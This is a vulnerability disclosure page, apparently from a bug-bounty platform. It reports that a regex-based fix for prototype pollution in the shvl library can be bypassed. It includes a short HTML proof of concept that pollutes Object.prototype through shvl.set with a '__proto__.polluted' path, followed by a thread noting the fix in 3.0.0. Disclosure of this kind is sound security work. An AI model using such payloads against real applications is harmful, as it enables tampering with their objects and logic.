Prototype Pollution in robinvdvleuten/shvl

Valid

Reported on

May 30th 2021


✍️ Description

Hi, I've seen a recent prototype pollution report to this library and, during the code review, found out that the applied fix doesn't work at all. The problem relies in the regex used to fix, as I shown bellow.

🕵️‍♂️ Proof of Concept

The reported prototype pollution resulted in the addition of the following regex to the source code:

!/^(__proto__|constructor|prototype)$/.test(path)

Which prevents anyone to use the exactly words __proto__, constructor or prototype as the entire path. But, since when someone is trying to pollute some attribute they need to define the attribute to be polluted, such as __proto__.polluted the presence of $ in the regex leads this fix to fail and keep shvl still vulnerable to prototype pollution. So, the payload from the las report still works as reported, this is my poc:

<!DOCTYPE html>
<html lang="en">
  <head>

    <title>poc</title>

    <script src="https://unpkg.com/shvl@latest/dist/shvl.umd.js"></script>
  </head>
    <script>
          quote = {}
          o = {}
          shvl.set(quote, "__proto__.polluted", "oi");
          
          if (o.polluted)
            console.log("is polluted!")
          else 
            console.log("is safe!")
    </script>
  </body>
</html>

💥 Impact

The impact of this vulnerability is that this library and everyone that use it remains vulnerable to prototype pollution as demonstrated in the last pwn2win 2021 challenge small-talk

Occurrences

Matheus Vrech
2 years ago

Researcher


I've already proposed a solution btw https://github.com/robinvdvleuten/shvl/pull/36

Matheus Vrech
2 months ago

Researcher


They merged my fix, the vulnerability no longer exists

Matheus Vrech
2 months ago

Researcher


@admin

Pavlos validated this vulnerability 2 months ago
Matheus Vrech has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 3.0.0 with commit 85b59f 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
index.js#L8 has been validated
Pavlos published this vulnerability 2 months ago
Pavlos
2 months ago

Admin


Good job @vrechson!

to join this conversation